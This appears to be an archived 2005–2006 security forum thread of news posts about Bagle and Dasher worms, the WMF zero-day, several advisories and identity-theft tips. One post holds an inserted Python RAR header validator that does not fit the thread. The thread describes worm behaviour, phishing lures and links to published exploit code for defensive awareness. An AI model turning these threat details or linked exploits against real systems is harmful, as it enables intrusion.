Best Practices: Send Real Greeting Cards or Plain Text Messages
http://isc.sans.org/diary.php?storyid=933
-
December 15, 2005 at 7:28 pm #3125842
New Beagle.CX/Bagle.CD variant
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
The Trojan horse version is out and there’s speculation that an email based version may follow.
McAfee
http://secunia.com/virus_information/25131/bagle.gend1511020/
Symantec
http://www.sarc.com/avcenter/venc/data/w32.beagle.cx@mm.html
Trend
http://secunia.com/virus_information/25129/trojbagle.cd/
Trojan Characteristics: This threat is detected as W32/Bagle.gen with the 4651 DAT files, or newer. This is a downloader trojan. However, like previous Bagle variants, it is likely that in the near future, the author(s) will post an accompanying EXE …
EMAIL TO BLOCK OR AVOID
Subject:
New Year’s
New Year’s Day.
Happy New Year
We congratulate happy New Year
New 2006
Message:
Password: –LINK TO IMAGE FILE–
The password is –LINK TO IMAGE FILE–
-
December 15, 2005 at 7:28 pm #3125515
Dasher.B – Internet worm exploits MS05-051 vulnerability
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
While the early versions of Dasher are not working well, this new development should be watched as the code to spread this new Internet based worm could be improved in later variants.
Dasher.B: Sophos information
http://www.sophos.com/virusinfo/analyses/w32dasherb.html
Dasher.A: F-Secure:
http://www.f-secure.com/weblog/archives/archive-122005.html#00000735
Dasher.A: MS05-051 (MSDTC) Malware / Port 1025
http://isc.sans.org/diary.php?storyid=934
W32/Dasher-B spreads by exploiting the MSDTC (MS05-051) vulnerability.
When run the worm creates the following files :
<Windows system folder>\wins\sqlexp.exe
<Windows system folder>\wins\sqlscan.exe
<Windows system folder>\wins\svchost.exe
Sqlscan.exe is a port scanner, used to search networks for open ports.
Sqlexp.exe and svchost.exe are detected as W32/Dasher-B.
W32/Dasher-B searches a set of pre-defined networks for open ports and attempts to exploit any vulnerable computers it finds. The exploit opens a backdoor on the vulnerable computer and causes it to connect to a remote server for further instructions. At the time of writing the instructions supplied by the remote server cause the exploited computer to download and execute two further programs.
-
December 19, 2005 at 1:19 pm #3123850
Microsoft IIS 5.1 for Windows XP – New DoS exploit published
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Microsoft has greatly improved the security associated with IIS and this DoS exploit is specifically targeted for IIS 5.1 running on Windows XP based systems. This is most likely a platform used by web development rather than production Internet based servers.
Microsoft IIS 5.1 – DoS exploit released
http://isc.sans.org/diary.php?storyid=944
Microsoft IIS Malformed URL Potential Denial of Service Vulnerability
http://secunia.com/advisories/18106/
Microsoft IIS 5.1 – FrSIRT advisory
While this link is safe, please be careful with any actual exploit links you find at the FrSIRT site
http://www.frsirt.com/english/advisories/2005/2963
QUOTE: Inge Henriksen has discovered a vulnerability in Microsoft Internet Information Services (IIS), which potentially can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error in the handling of certain malformed URLs. This can be exploited to cause the IIS service to crash.
Successful exploitation requires that “[dir]” is a virtual directory that is configured with “Scripts & Executables” execution permissions.
Note: IIS will automatically restart after the crash. The vulnerability has been confirmed in IIS 5.1 on a fully patched version of Microsoft Windows XP SP2.
Solution: Filter potential malicious characters or character sequences with a HTTP proxy.
Special Note: IIS 5.0 and 6.0 are reportedly not affected.
-
December 20, 2005 at 9:21 am #3125058
MS05-051 – Dasher.D appears to be more potent than prior variants
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Malicious individuals are continuing to improve the capability for the new Dasher Internet worm to spread more actively to unpatched systems. We will most likely see more variants attempting to attack any unpatched systems.
MS05-051 – Dasher.D appears to be more potent than prior variants
http://securityresponse.symantec.com/avcenter/venc/data/w32.dasher.d.html
* Microsoft Windows MSDTC Memory Corruption Vulnerability (as described in the Microsoft Security Bulletin MS05-051) on TCP port 1025.
* The Microsoft Windows WINS Name Value Handling Remote Buffer Overflow Vulnerability(as described in the Microsoft Security Bulletin MS05-051), using TCP port 42.
* The Microsoft Windows Plug and Play Buffer Overflow Vulnerability (described in Microsoft Security Bulletin MS05-039)
* The Microsoft SQL Server User Authentication Remote Buffer Overflow Vulnerability (described in Microsoft Security Bulletin MS02-056). -
December 20, 2005 at 1:18 pm #3124866
Symantec AV products – Critical Buffer Overflow on RAR files
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Symantec will most likely quickly patch this newly discovered vulnerability and currently there are no known exploits in the wild.
Symantec AV products – Critical Buffer Overflow on RAR files
http://www.frsirt.com/english/advisories/2005/3003
Advisory ID : FrSIRT/ADV-2005-3003
CVE ID : GENERIC-MAP-NOMATCH
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2005-12-20
Technical Description — A critical vulnerability has been identified in various Symantec AntiVirus products, which may be exploited by remote attackers or malware to execute arbitrary code. This flaw is due to a heap overflow error in the “Dec2Rar.dll” library when processing certain length fields in the sub-block headers of RAR archives, which may be exploited by an unauthenticated remote attacker to execute arbitrary commands and take complete control of an affected system (e.g. by sending an email containing a specially crafted attachment).
Currently FrSIRT is unaware of any patches.
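The advisory above describes a heap overflow that comes from trusting length fields in RAR sub-block headers. The following is an added example, not Symantec's code and not a reproduction of the Dec2Rar.dll flaw: a bounds-checked walk over RAR block headers that refuses to act on any declared size before checking it against the bytes actually left in the buffer. It assumes the generic RAR block header layout (HEAD_CRC u16, HEAD_TYPE u8, HEAD_FLAGS u16, HEAD_SIZE u16, plus a u32 ADD_SIZE when flag 0x8000 is set); the sample archives are constructed for the example and carry no real data.

```python
"""Bounds-checked walk over RAR block headers.

Added example for this post; it is not Symantec's code and does not reproduce
the Dec2Rar.dll flaw. It shows the check a parser needs before it trusts a
header length field: every declared size is compared with the bytes that are
actually left in the buffer before anything is copied or skipped. The block
header layout assumed here is the generic RAR one (HEAD_CRC u16, HEAD_TYPE u8,
HEAD_FLAGS u16, HEAD_SIZE u16, plus a u32 ADD_SIZE when flag 0x8000 is set);
the sample archives are constructed for the example and contain no real data.
"""
import struct

RAR_MARKER = b"Rar!\x1a\x07\x00"  # marker block; it parses as a 7-byte block of type 0x72
BASE_HEADER_LEN = 7               # HEAD_CRC(2) + HEAD_TYPE(1) + HEAD_FLAGS(2) + HEAD_SIZE(2)
LONG_BLOCK = 0x8000               # HEAD_FLAGS bit: a 4-byte ADD_SIZE (data length) follows


def walk_blocks(data: bytes) -> list:
    """Return [(offset, head_type, head_size, add_size)] or raise ValueError.

    A hostile archive can claim any HEAD_SIZE or ADD_SIZE it likes; the parser
    must never let those numbers drive a read or copy past the buffer it owns.
    """
    if not data.startswith(RAR_MARKER):
        raise ValueError("marker block missing: not a RAR archive")
    blocks = []
    off = 0
    while off < len(data):
        remaining = len(data) - off
        if remaining < BASE_HEADER_LEN:
            raise ValueError(f"offset {off}: truncated block header")
        _crc, head_type, flags, head_size = struct.unpack_from("<HBHH", data, off)
        fixed_len = BASE_HEADER_LEN
        add_size = 0
        if flags & LONG_BLOCK:
            fixed_len += 4
            if remaining < fixed_len:
                raise ValueError(f"offset {off}: ADD_SIZE field runs past end of data")
            add_size = struct.unpack_from("<I", data, off + BASE_HEADER_LEN)[0]
        # The declared header must at least cover the fields we just read ...
        if head_size < fixed_len:
            raise ValueError(
                f"offset {off}: HEAD_SIZE {head_size} smaller than fixed fields ({fixed_len})")
        # ... and header plus data must fit in what is left of the buffer.
        if head_size + add_size > remaining:
            raise ValueError(
                f"offset {off}: declared {head_size + add_size} bytes but only {remaining} remain")
        blocks.append((off, head_type, head_size, add_size))
        off += head_size + add_size
    return blocks


def validate(data: bytes) -> str:
    """Convenience wrapper: 'ok: N blocks' or 'rejected: <reason>'."""
    try:
        return f"ok: {len(walk_blocks(data))} blocks"
    except ValueError as exc:
        return f"rejected: {exc}"


# --- constructed samples (header bytes only, no payload) ----------------------
_ARCHIVE_HEADER = struct.pack("<HBHH", 0, 0x73, 0, 13) + b"\x00" * 6         # HEAD_SIZE 13
_SUB_BLOCK = struct.pack("<HBHHI", 0, 0x7A, LONG_BLOCK, 15, 5) + b"\x00" * 4  # 15-byte header, 5 data bytes
GOOD_ARCHIVE = RAR_MARKER + _ARCHIVE_HEADER + _SUB_BLOCK + b"hello"

# Sub-block whose ADD_SIZE points far beyond the buffer: the kind of length
# field a naive parser would hand straight to a copy routine.
OVERSIZED_ARCHIVE = RAR_MARKER + struct.pack("<HBHHI", 0, 0x7A, LONG_BLOCK, 11, 0xFFFFFFF0)

# HEAD_SIZE smaller than the fields already read would make a naive parser
# step backwards or compute a negative remaining length.
UNDERSIZED_ARCHIVE = RAR_MARKER + struct.pack("<HBHH", 0, 0x74, 0, 3)

if __name__ == "__main__":
    for label, sample in [("good", GOOD_ARCHIVE), ("oversized", OVERSIZED_ARCHIVE),
                          ("undersized", UNDERSIZED_ARCHIVE)]:
        print(f"{label:10s} {validate(sample)}")
```

The two rejection paths are the ones that matter for this bug class: a length that is too large for the remaining buffer, and a header length smaller than the fields already consumed. Both are checked before the offset is advanced, so a malformed header can never position the parser outside the data it was given.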
-
December 22, 2005 at 5:37 am #3198113
Article: The human factor and information security
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Computer Security involves a two-part process of protecting resources. The first component is adding security software and fortifying defenses so that most attacks from the outside can be blocked. The second step is making certain folks follow the best practices in security, so that they resist traps and social engineering schemes.
You can think of step one as placing a fence around the chicken coop to keep the fox out. But if the chicken opens the door and lets a disguised fox in, then they’ve lost the battle. Thus users should always protect their systems with anti-virus, anti-spyware, and firewall software. Secondly, they need to “think before they click” and suspect that any email or instant message could pose harm for their systems.
http://www.viruslist.com/en/analysis?pubid=176195190
Key Topics in the article
- Computer security as a system
- People are part of the system
- Security vulnerabilities and some examples
- Conclusion
-
December 22, 2005 at 5:37 am #3198112
Santa IM worm – Invites users to a Santa site and installs a rootkit
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Folks need to treat Instant Messages with the same care and suspicions they would email. Files or URLs found in Instant Messages can be malicious. This new IM worm installs a rootkit which can be very difficult for AV software to detect and remove.
Links are noted below
QUOTE: A new worm posing as a come-on to a Santa Claus site is traveling across all the major instant messaging networks, a security firm warned Tuesday, and when recipients visit the bogus site, they’re infected with a file hidden from sight by a rootkit. IMlogic said that the worm, dubbed “M.GiftCom.All,” is circulating on the MSN, AOL, ICQ, and Yahoo instant messaging services, is a “Medium” threat, a relatively rare classification for the Waltham, Mass.-based company. Most IM worms and Trojans listed on its Threat Center receive only a “Low” classification. Like virtually all IM worms, M.GiftCom.All includes a URL in messages it spams out to contacts hijacked from previously-infected PCs
-
December 22, 2005 at 1:39 pm #3198281
Identity Theft: Some helpful tips to prevent this
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
A corporate attorney sent the following out to the employees in his company.
1. The next time you order checks have only your initials (instead of first name) and last name put on them. If someone takes your checkbook, they will not know if you sign your checks with just your initials or your first name, but your bank will know how you sign your checks.
2. Do not sign the back of your credit cards. Instead, put “PHOTO ID REQUIRED.”
3. When you are writing checks to pay on your credit card accounts, DO NOT put the complete account number on the “For” line. Instead, just put the last four numbers. The credit card company knows the rest of the number, and anyone who might be handling your check as it passes through all the check-processing channels will not have access to it.
4. Put your work phone # on your checks instead of your home phone. If you have a PO Box, use that instead of your home address. If you do not have a PO Box, use your work address. Never have your Social Security printed on your checks, (DUH!). You can add it if it is necessary. However, if you have it printed, anyone can get it.
5. Place the contents of your wallet on a photocopy machine. Do both sides of each license, credit card, etc. You will know what you had in your wallet and all of the account numbers and phone numbers to call and cancel. Keep the photocopy in a safe place. Also carry a photocopy of your passport when traveling either here or abroad. We have all heard horror stories about fraud that is committed on us in stealing a name, address, Social Security number, credit cards.
6. When you check out of a hotel that uses cards for keys (and they all seem to do that now), do not turn the “keys” in. Take them with you and destroy them. Those little cards have on them all of the information you gave the hotel, including address and credit card numbers and expiration dates. Someone with a card reader, or employee of the hotel, can access all that information with no problem whatsoever.
* * *
Unfortunately, as an attorney, I have first hand knowledge because my wallet was stolen last month. Within a week, the thief (or thieves) ordered an expensive monthly cell phone package, applied for a VISA credit card, had a credit line approved to buy a Gateway computer and received a PIN number from DMV to change my driving record information online. Here is some critical information to limit the damage in case this happens to you or someone you know:
1. We have been told we should cancel our credit cards immediately. The key is having the toll free numbers and your card numbers handy so you know whom to call. Keep those where you can find them.
2. File a police report immediately in the jurisdiction where your credit cards, etc., were stolen. This proves to credit providers you were diligent, and this is a first step toward an investigation (if there ever is one). However, here is what is perhaps most important of all (I never even thought to do this.)
3. Call the three national credit reporting organizations immediately to place a fraud alert on your name and Social Security number. I had never heard of doing that until advised by a bank that called to tell me an application for credit was made over the Internet in my name. The alert means any company that checks your credit knows your information was stolen, and they have to contact you by phone to authorize new credit. By the time I was advised to do this, almost two weeks after the theft, all the damage had been done. There are records of all the credit checks initiated by the thieves’ purchases, none of which I knew about before placing the alert. Since then, no additional damage has been done, and the thieves threw my wallet away this weekend (someone turned it in). It seems to have stopped them dead in their tracks.
Now, here are the numbers you always need to contact about your wallet and contents being stolen:
1.) Equifax: 1-800-525-6285
2.) Experian (formerly TRW): 1-888-397-3742
3.) TransUnion : 1-800-680-7289
4.) Social Security Administration (fraud line): 1-800-269-0271
-
December 24, 2005 at 9:36 am #3081357
Bagle – New variants use ZIP files with an individual’s name
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Several new variants of the Bagle downloader trojan and corresponding email worm have surfaced recently. These new variants use ZIP files with an individual’s name as a social engineering scheme to appear as possibly safe attachments. Users should avoid opening any email attachment until it has been tested to ensure it is safe, even on legitimate email correspondence.
This is a downloader trojan. However, like previous Bagle variants, it is likely that in the near future, the author(s) will post an accompanying EXE file on a remote server, which SPAMs new versions of Bagle (not to addresses harvested on the local system, but to addresses specified in spam lists also on remote web servers). This trojan was mass-spammed in a ZIP attachment and uses people’s names as the filenames:
- Edmund.zip
- Elizabeth.zip
- Fraunces.zip
- Grace.zip
- Henrie.zip
- Jeames.zip
Symantec information is noted below:
Several reports from Sophos are noted below:
– BagleDl-BD Reported by Sophos
– BagleDl-BB Reported by Sophos
– BagleDl-BC Reported by Sophos
– BagleDl-BA Reported by Sophos
– BagleDl-AZ Reported by Sophos
-
December 24, 2005 at 5:36 pm #3081301
phpBB Remote Command Execution and SQL Injection Exploit
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
A major new phpBB attack is circulating and site administrators should ensure they are on phpBB version 2.0.18 or higher.
phpBB Remote Command Execution and SQL Injection Vulnerabilities
http://www.frsirt.com/english/advisories/2005/2250
Technical Description: Multiple vulnerabilities were identified in phpBB, which could be exploited by remote attackers to execute arbitrary commands or conduct SQL injection and cross site scripting attacks.
Exploit Code example
Please be careful as actual exploit code is present here
http://www.frsirt.com/exploits/20051224.r57phpbb2017.pl.php
Affected Products: phpBB version 2.0.17 and prior
Solution – Upgrade to phpBB version 2.0.18
http://www.phpbb.com/downloads.php
-
December 25, 2005 at 5:38 am #3081252
SpyWare Forums: The twelve e-mails of Christmas!
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Some of my friends at the SpyWare forums have created an interesting version of the 12 days of Christmas. May everyone reading this have a wonderful Christmas, Hanukkah, and other special holidays being celebrated at this time. Here’s also hoping that 2006 is the best year ever as we go into a brand new year next week.
SpyWare Forums: The twelve e-mails of Christmas!
On the first day of Christmas my e-mail sent to me; A virus for my PC.
On the second day of Christmas my e-mail sent to me; Two Sasser Worms, and a virus for my PC.
On the third day of Christmas my e-mail sent to me; Three search bars, two Sasser Worms and a virus for my PC.
On the fourth day of Christmas my e-mail sent to me; Four Trojan horses, three search bars, two Sasser Worms and a virus for my PC.
On the fifth day of Christmas my e-mail sent to me; Cool Web Search, four Trojan horses, three search bars, two Sasser Worms and a virus for my PC.
On the sixth day of Christmas my e-mail sent to me; Six WinTools, Cool Web Search, four Trojan horses, three search bars, two Sasser Worms and a virus for my PC.
On the seventh day of Christmas my e-mail sent to me; Seven rootkits, six WinTools, Cool Web Search, four Trojan horses, three search bars, two Sasser Worms and a virus for my PC.
On the eighth day of Christmas my e-mail sent to me; Eight Smitfrauds, seven rootkits, six WinTools, Cool Web Search, four Trojan horses, three search bars, two Sasser Worms and a virus for my PC.
On the ninth day of Christmas my e-mail sent to me; Nine Qoologics, eight Smitfrauds, seven rootkits, six WinTools, Cool Web Search, four Trojan horses, three search bars, two Sasser Worms and a virus for my PC.
On the tenth day of Christmas my e-mail sent to me; Ten BHOs, nine Qoologics, eight Smitfrauds, seven rootkits, six WinTools, Cool Web Search, four Trojan horses, three search bars, two Sasser Worms and a virus for my PC.
On the eleventh day of Christmas my e-mail sent to me; Eleven peper files, ten BHOs, nine Qoologics, eight Smitfrauds, seven rootkits, six WinTools, Cool Web Search, four Trojan horses, three search bars, two Sasser Worms and a virus for my PC.
On the twelfth day of Christmas my e-mail sent to me; A link to http://forums.spywareinfo.com
-
December 25, 2005 at 5:35 pm #3082457
Linux Security: IP Tables Tutorial
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Below are some key links that can help strengthen Linux security controls:
Internet Storm Center Article
http://isc.sans.org/diary.php?storyid=962
Introduction to IP Tables
http://www.ip-solutions.net/firewall/servers.html
Advanced Tutorial
http://www.sans.org/rr/special/index.php?id=adaptive_firewalls
-
December 26, 2005 at 9:35 am #3082369
VMware – Critical Security Update should be applied quickly
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
VMware is a great management product for server consolidation as it creates logical partitions on large corporate servers to run multiple operating systems efficiently. A critical security update has been issued and system administrators are urged to apply this patch quickly.
VMware ESX Server – Critical update for Cross Site Scripting Issue
http://www.frsirt.com/english/advisories/2005/3084
Advisory ID : FrSIRT/ADV-2005-3084
Rated as : Moderate Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2005-12-24
Technical Description: A vulnerability has been identified in VMware ESX Server, which may be exploited by attackers to inject malicious HTML code. This flaw is due to an input validation error in the VMware Management Interface that does not properly validate certain parameters, which may be exploited by attackers to cause arbitrary scripting code to be executed by the user’s browser in the security context of an affected Web site.
Affected Products: VMware ESX Server 2.0.x, 2.1.x, 2.5.x
Solution: Apply latest VMware Patches
http://www.vmware.com/support/kb/enduser/std_adp.php?p_faqid=2001
-
December 26, 2005 at 9:35 am #3082368
Spam messages could use Seasonal Greetings in subject line to trick users
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
During the past week, several spam emails have been received labeled simply as “MERRY CHRISTMAS”. However, the author was an unfamiliar name, so that is one method to quickly spot and avoid these types of messages.
As a person’s name is spoofed in the author field, these messages could appear to be legitimate. On a couple of these, the author seemed to be a familiar name and I wasn’t certain if it was spam until the message was opened.
Some of these messages were carefully evaluated from a security standpoint. While most were aggressive advertising messages, some pointed to websites. Visiting an unknown website can introduce spyware or other malware agents.
Most likely “HAPPY NEW YEAR” messages will be coming. In addition to spam, many viruses use themes and social engineering approaches centered around holiday greetings.
Please be careful with all email you encounter, as messages that appear to be safe could be designed to trick folks into infecting their PCs with spyware or viruses. Keep your AV software and Windows updated to the latest levels of protection. Finally, as an additional safety precaution, processing email in a plain text mode can help some.
-
December 27, 2005 at 9:35 am #3083020
Virkel.F: Spoofed as an MSN Messenger beta 8 download
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
A new MSN “beta” is being offered to lure folks into infecting their existing PCs and MSN environment. As a best practice, never accept software updates or products by email. As an example, Microsoft does not distribute any software by email.
Virkel.F: Spoofed as an MSN Messenger beta 8 download
QUOTE: There is no MSN Messenger 8. Not yet anyway. However, there’s a new virus going around pretending to be “MSN Messenger 8 Working BETA”. There are two ways to catch it. First, by downloading it from a fake site where it has been supposedly “leaked” …
-
December 28, 2005 at 5:37 pm #3083710
Malicious Zero Day Windows Media File Exploits are in-the-wild
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Please be careful with sites that you visit and particularly playing WMF (Windows Media File) using Internet Explorer or other browsers. I believe Microsoft will prioritize and patch this new vulnerability expediently, so please look for upcoming security advisories, workarounds, and ultimately a patch. In the meantime, follow best practices in only visiting safe sites and keep your AV protection updated as anti-virus vendors will also prioritize security protection for this new in-the-wild exploit. Finally, the workaround offered by FrSIRT appears promising, as noted at the bottom.
STATUS INFORMATION
INTERNET STORM CENTER – YELLOW ALERT
F-SECURE BLOG – GOOD STATUS INFORMATION
SUNBELT BLOG – GOOD STATUS INFORMATION
SECUNIA INFORMATION
Microsoft Windows WMF Handling Arbitrary Code Execution
http://secunia.com/advisories/18255/
Secunia Advisory: SA18255
Release Date: 2005-12-28
Rating: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
QUOTE: A vulnerability has been discovered in Microsoft Windows, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to an error in the handling of corrupted Windows Metafile files (“.wmf”). This can be exploited to execute arbitrary code by tricking a user into opening a malicious “.wmf” file in “Windows Picture and Fax Viewer” or previewing a malicious “.wmf” file in explorer (i.e. selecting the file). This can also be exploited automatically when a user visits a malicious web site using Microsoft Internet Explorer.
Solution: Do not open or preview untrusted “.wmf” files and set security level to “High” in Microsoft Internet Explorer.
TREND MICRO INFORMATION
TWO TROJAN HORSE VARIANTS SO FAR
QUOTE: The Windows Picture and Fax Viewer vulnerability is a zero-day exploit that is capable of remote code execution. Zero-day exploits are termed as such because the unpatched vulnerability and its corresponding exploit code are released within the same day. This may pose as a dangerous situation in which a lot of systems may be affected due to the availability of exploit code, and the fact that the vendor has not been given enough time to patch it.
FRSIRT INFORMATION
Microsoft Windows WMF Handling Remote Code Execution Vulnerability
http://www.frsirt.com/english/advisories/2005/3086
FrSIRT Advisory: FrSIRT/ADV-2005-3086
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2005-12-28
Recommended Workaround by FrSIRT: Disable “Windows Picture and Fax Viewer” : on the Start menu, choose Run, and then type “regsvr32.exe /u shimgvw.dll”.
-
December 29, 2005 at 1:37 am #3083642
Microsoft Security Advisory 912840 issued for WMF vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Microsoft has issued a security advisory to share initial information on this new unpatched vulnerability, which is being exploited in-the-wild. As Microsoft advises, keep your AV and anti-spyware software updated to the latest definitions.
Microsoft Security Advisory (912840)
Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/912840.mspx
-
December 29, 2005 at 5:35 am #3083597
Current recommendations for Malicious WMF Exploits in-the-wild
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Microsoft has issued Security Advisory 912840, “Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution”. As noted in the bulletin, they have the highest priority in testing out and providing solutions for the WMF exploits that are currently circulating. So far, most WMF attacks come from visiting unsafe websites, so follow best practices and “think before you click” in web surfing and never click on links in email or Instant Messaging.
Current recommendations for Malicious WMF Exploits in-the-wild
1. Keep your Anti-Virus and Anti-Spyware software as up-to-date as possible. McAfee users should install DAT 4661 or higher now
2. Stay away from any questionable sites and do not open WMF files or links in any environment (e.g., IM, email, web surfing, explorer, etc.).
3. Filter and block WMF files in email or content filtering systems
4. Don’t rely just on the WMF extension as Windows metadata processing can process a disguised and renamed extension. For example, the extension of a WMF file might be renamed to GIF and when Windows tries to open it, it may recognize that it’s a WMF file originally and try to open it that way.
5. As an extra safety precaution, you can turn off the vulnerable DLL. The Full Disclosure workaround has a downloadable *.REG file that allows toggling shimgvw.dll on and off. Another option might be to turn off the shimgvw.dll service completely, which will result in a minor loss of functionality. Turning off this DLL will impact thumbnail previews in Windows Explorer and Windows Fax & Picture viewer, as both will no longer work. Still you can restore this service later after better protective solutions emerge.
Please click on this link for more information:
Malicious Zero Day Windows Media File Exploits are in-the-wild
-
December 31, 2005 at 5:36 pm #3081901
Browser Security Testing Site: scanit.be
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
A security firm from Belgium offers a testing facility for browsers. I tested IE 6 (XP SP2 version), Firefox 1.5, and Opera 8.51 and all three passed the test as follows:
The Browser Security Test is finished. Please find the results below:
High Risk Vulnerabilities 0
Medium Risk Vulnerabilities 0
Low Risk Vulnerabilities 0
QUOTE: Can someone hack into your computer via your browser? How vulnerable are you? Can websites install spyware through your browser? Scanit’s Browser Security Test automatically checks your browser for various security problems. When the test is finished you get a complete report explaining the discovered vulnerabilities, their impact and how to eliminate them.
-
December 31, 2005 at 5:36 pm #3081899
New WMF Exploit version emerges – ISC returns to Yellow alert
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
There is a “new and improved” edition of the WMF exploit that does not use a WMF extension. It also varies in size randomly to better evade AV detection. A code Yellow alert has been issued by the Internet Storm Center. There is little or no AV protection available, so extra caution should be used.
New exploit released for the WMF vulnerability – YELLOW
http://isc.sans.org/diary.php?storyid=992
A copy of the actual exploit can be found at FrSIRT for anyone wanting to review the code, but please use caution. The exploit generates files with the following characteristics:
* with a random size;
* no .wmf extension, (.jpg), but could be any other image extension actually;
* a random piece of junk in front of the bad call; carefully crafted to be larger than the MTU on an ethernet network;
* a number of possible calls to run the exploit are listed in the source;
* a random trailer
-
December 31, 2005 at 5:36 pm #3081900
New IM Worm – used to spread malicious WMF exploit
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Kaspersky has received information on a new IM worm that is hitting the Netherlands. Apparently the worm is spreading with MSN and is spreading with a malformed WMF file called xmas-2006 FUNNY.jpg
Please be careful when opening the New Years Greeting links or other seasonal greetings.
-
December 31, 2005 at 9:36 pm #3081874
New WMF variant – McAfee protection to be released in DAT 4664
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
McAfee has just updated their website with information related to the new WMF variant. There is some generic protection for the new variant currently. An extra DAT file can also be applied now to provide protection using this special approach for a single new virus. The next DAT file release of 4664 will address this new risk fully for all users. This appears to be scheduled for Monday, unless this new variant requires an earlier emergency release.
http://vil.nai.com/vil/content/v_137760.htm
— December 31, 2005 —
QUOTE: Source code for a tool that creates Exploit-WMF files has been posted to the web. This source creates malicious WMF files that exploit the vulnerability in a slightly different way than previous ones. While generic detection has existed since the discovery of Exploit-WMF, this new code requires the first adjustment to that detection in order to cover some exploits that may be created by this source code. The updated detection will be released in the 4664 DAT files and is currently available via an EXTRA.DAT file: An extra.dat file for Exploit-WMF may be downloaded via the Extra Dat Request Page.
-
January 1, 2006 at 5:39 am #3081846
New WMF variant – McAfee protection was released in DAT 4664
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
McAfee has just updated their website with information related to the new WMF variant. There is some generic protection for the new variant currently. An extra DAT file can also be applied now to provide protection using this special approach for a single new virus. AVERT made an emergency release of DAT file 4664 on New Year’s eve that addresses this new risk. Corporate and home users should apply this new level of protection as soon as possible.
http://vil.nai.com/vil/content/v_137760.htm
QUOTE: — December 31, 2005 —
Source code for a tool that creates Exploit-WMF files has been posted to the web. This source creates malicious WMF files that exploit the vulnerability in a slightly different way than previous ones. While generic detection has existed since the discovery of Exploit-WMF, this new code requires the first adjustment to that detection in order to cover some exploits that may be created by this source code. The updated detection has been released in the 4664 DAT files.
— Update 1 —
An email message containing an Exploit-WMF sample built from this new code has been spammed. The message appears as follows:
Subject: Happy New Year
Body: picture of 2006
Attachment: HappyNewYear.jpg (actually a WMF file with a .JPG extension)
The attachment causes a new BackDoor-CEP variant to be downloaded and run from a hostile web site.
— Update 2 —
Due to the serious nature of the WMF vulnerability and recent discovery of new exploit code, the 4664 DAT files were released out of cycle to detect these new Exploit-WMF samples.
-
January 1, 2006 at 5:39 am #3081845
New WMF exploit version spammed as Happy New Year greetings
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Please note that the 2nd generation of the WMF exploit has been spammed out via email. It appears as a Happy New Year’s greeting. This is briefly noted in McAfee’s release for DAT 4464 which covers this new variant.
McAfee – DAT 4464 released early for new WMF version
http://vil.nai.com/vil/content/v_137760.htm
An email message containing an Exploit-WMF built from this new code has been spammed. The message appears as follows:
Subject: Happy New Year
Body: picture of 2006
Attachment: HappyNewYear.jpg (actually a WMF file with a .JPG extension)
-
January 1, 2006 at 5:39 am #3081844
Internet Storm Center offers FAQ on new WMF Exploits
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
The Internet Storm Center has posted excellent information in the form of Frequently Asked Questions for new WMF Exploits:
-
January 2, 2006 at 3:33 am #3081087
2nd Generation WMF exploit – Only a few AV vendors can detect it
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
In testing at the Virus Total site, where over a dozen AV vendors participate, only 3 AV vendors detected the new variable length WMF exploit version. Most likely more AV vendors will add protection today.
2nd Generation WMF exploit – Only a few AV vendors can detect it
http://isc.sans.org/diary.php?storyid=998
Vendor      Version   Date        Detection
eTrust-Vet  12.4.1.0  01.01.2006  Win32/Worfo
McAfee      4664      01.01.2006  Exploit-WMF
Symantec    8.0       01.01.2006  Backdoor.Trojan
****** Note that the Symantec detect is most likely on the payload.
-
January 2, 2006 at 7:33 am #3081063
The WMF Exploit – Ideas for system administrators returning to work
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
In the various forums I participate in, I saw that many administrators worked during the holiday period, which is one reason we celebrate Systems Administrator appreciation day on July 28. This new zero day exploit is very serious and depending on the malware attack it can damage PCs so that they need to be rebuilt from the ground-up. Not only are there limited defenses on the Windows Meta File (WMF) exploit but it impacts almost every version of Windows.
Below are some key steps security and system administrators should take in fortifying their environments:
